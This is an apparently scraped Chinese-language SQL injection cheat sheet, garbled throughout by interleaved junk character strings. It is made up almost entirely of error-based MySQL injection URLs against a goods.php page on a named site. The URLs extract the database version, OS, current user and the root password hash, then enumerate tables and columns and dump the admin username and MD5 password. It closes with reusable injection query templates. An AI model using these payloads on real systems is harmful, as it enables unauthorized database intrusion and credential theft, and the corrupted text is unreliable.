判断版本号 I7 z3 I; l; w8 Y) y
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20@@version%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23' K5 e( \) W6 B$ o5 e
; X4 V r2 }& c& d: A3 R判断系统
, s; F% Y6 i$ o0 Y( n* \7 ~5 i& {; q* O! V# X
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20@@version_compile_os%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
6 r& O! U1 v) x" K3 R! o8 u$ R$ X& \6 a+ V% ^7 v
2 B+ ~# l+ g- j7 P9 x8 t
8 o+ D6 y- V9 H3 P5 K& ~; W当前 user(): H6 r8 }# D9 U5 n6 \
" J7 {2 Z; K0 F2 e& c; P" e
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20user()%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%230 ]' V. u9 } g! V0 ~) [
% `& B- h2 @5 b
6 y' j& |5 H8 Z0 g" \7 z
& L0 O3 q5 r, O
当前 database(), Q" V9 E, \1 c) d8 _
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20database()%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23* f, m1 r& i! W: L5 M. m
b7 L% Z0 s# e5 N% g- I1 e
: L/ |. j( E c9 S% N! _! O8 V& B0 J; o m' J
) i t0 ^$ L, a: v! q3 h
root hash8 x: c1 C7 `: t* T' V% \! |
" ]0 {, a9 y+ E4 }
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20Password%20from%20mysql.user%20where%20User=char(114,111,111,116)),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23- l" m2 a4 U. d$ V
1 w/ f/ a- ?; c/ V H9 m
; D% Z! C, Q! ^# W) s0 T6 J p6 K4 L: J) Q6 {$ g5 |6 j" b0 {
当前 数据库表名
; ?* |" Q& {1 q0 n. y8 u+ W8 K# q6 v4 c3 T& G
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20TABLE_NAME%20%20from%20information_schema.tables%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20limit%206,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
# }" W) O9 E* O' g& F B; }6 {& L8 l
' F% w! I4 `" n1 O1 |% c* A9 ~' R6 ]0 o
% _+ u% q, K$ x
当前 数据库 user_name 字段! a- D X4 ^; e! H
3 ^$ \/ y5 `' A8 z4 mhttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20%20COLUMN_NAME%20from%20information_schema.COLUMNS%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20and%20TABLE_NAME=char(101,99,115,95,97,100,109,105,110,95,117,115,101,114)%20limit%202,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23; T, S) N' Q! w+ n* J5 z F7 x
, B& U, W7 h( H, l! K当前 数据库 字段 password, J+ j+ S @+ q# ]1 g8 j8 r
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20%20COLUMN_NAME%20from%20information_schema.COLUMNS%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20and%20TABLE_NAME=char(101,99,115,95,97,100,109,105,110,95,117,115,101,114)%20limit%204,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23# Q7 ]! t/ X8 x& `: \( h* o
1 z$ U$ b- V+ ~* V7 h
( U) H) O8 i5 n4 i" |" H9 l+ W" c- F( A
获得 admin passwd(md5)# m/ Z5 D B3 y2 W5 h9 p
' n4 ]7 ^: t3 o! j
2 S: n9 l1 H9 ?2 O: `' F" lhttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20concat_ws(char(94),ifnull(cast(%60password%60%20as%20char),char(32)),ifnull(cast(%60user_name%60%20as%20char),char(32)))%20%20from%20sansan1.ecs_admin_user%20limit%200,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23% c3 F9 R& [# k( q0 c$ g
: V% `/ {+ k6 d2 V, O报错注射 }" j& f4 `, P! y" g
SELECT * FROM table_name where uid = -1 union select 1,(select 1 from(select count(*),concat((select (Select version()) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a)
, `. M: [4 _. `; W# ^; t$ y+ L! ^& N3 d- H" L z
SELECT * FROM table_name where uid = -1 union select 1,(select 1 from(select count(*),concat((select (Select username FROM admin_table LIMIT 0,1) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a)
V8 B' I( a2 Z# j9 @
4 K4 g9 G; m" x' x+ R, zand(select 1 from(select count(*),concat((select (select (Select concat(0x7e,0x27,SCHEMA_NAME,0x27,0x7e) FROM information_schema.SCHEMATA LIMIT 21,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) |